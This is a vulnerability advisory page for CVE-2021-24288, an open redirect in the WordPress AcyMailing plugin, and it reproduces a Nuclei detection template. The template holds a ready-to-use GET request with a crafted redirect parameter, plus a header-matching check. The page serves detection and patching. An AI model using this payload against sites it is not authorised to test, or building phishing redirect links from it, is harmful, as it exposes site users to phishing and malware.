CVE-2021-24288: WordPress AcyMailing <7.5.0 - Open Redirect

日期: 2025-08-01 | 影响软件: WordPress AcyMailing | POC: 已公开

漏洞描述

WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.

PoC代码[已公开]

id: CVE-2021-24288

info:
  name: WordPress AcyMailing <7.5.0 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
  remediation: |
    Update the AcyMailing plugin to version 7.5.0 or later to fix the open redirect vulnerability.
  reference:
    - https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24288
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24288
    cwe-id: CWE-601
    epss-score: 0.04398
    epss-percentile: 0.88571
    cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: acymailing
    product: acymailing
    framework: wordpress
  tags: cve,cve2021,wpscan,wordpress,redirect,wp-plugin,acymailing

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a004730450220743fd51c2924e633b8f26b918a180b00b335a56e1ed0aaaed3be356db09c38b9022100a861410903b10b8a7da1784735b33dd8261726e0532cf020c24902d477aa9cf3:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-24288.yaml

相关漏洞推荐